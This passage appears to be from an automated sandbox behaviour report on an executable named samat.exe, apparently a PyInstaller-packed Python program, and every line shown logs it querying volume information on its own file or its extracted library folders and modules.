                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI52282\_socket.pyd VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI52282 VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI52282 VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI52282\_ssl.pyd VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI52282 VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI52282\win32 VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI52282\setuptools\_vendor VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI52282 VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI52282\setuptools\_vendor\jaraco\text\Lorem ipsum.txt VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI52282\setuptools\_vendor\jaraco\text\Lorem ipsum.txt VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI52282 VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI52282\win32 VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI52282\pywin32_system32 VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI52282\setuptools\_vendor VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI52282\setuptools VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI52282 VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI52282\win32 VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI52282\setuptools\_vendor VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI52282\setuptools VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI52282\setuptools VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI52282 VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI52282\win32 VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI52282\pywin32_system32 VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI52282\setuptools\_vendor VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI52282\win32 VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI52282 VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI52282 VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI52282\setuptools VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI52282\setuptools VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI52282\base_library.zip VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI52282\base_library.zip VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI52282\base_library.zip VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI52282\base_library.zip VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI52282\base_library.zip VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI52282 VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI52282\win32 VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI52282\pywin32_system32 VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI52282 VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI52282 VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI52282 VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI52282 VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI52282 VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI52282\win32 VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI52282\pywin32_system32 VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI52282\setuptools\_vendor VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI52282 VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI52282\win32 VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI52282\pywin32_system32 VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI52282\setuptools\_vendor VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI52282\win32 VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI52282\setuptools\_vendor VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI52282 VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI52282\win32 VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI52282\pywin32_system32 VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI52282 VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI52282\win32 VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI52282\pywin32_system32 VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI52282\setuptools\_vendor VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI52282 VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI52282\win32 VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI52282\setuptools\_vendor VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI52282 VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI52282 VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI52282 VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI52282\win32 VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI52282\pywin32_system32 VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI52282\setuptools\_vendor VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI52282\charset_normalizer VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI52282\charset_normalizer VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI52282\charset_normalizer VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI52282\charset_normalizer\md.cp313-win_amd64.pyd VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI52282\charset_normalizer VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI52282\charset_normalizer\md__mypyc.cp313-win_amd64.pyd VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe VolumeInformationJump to behavior
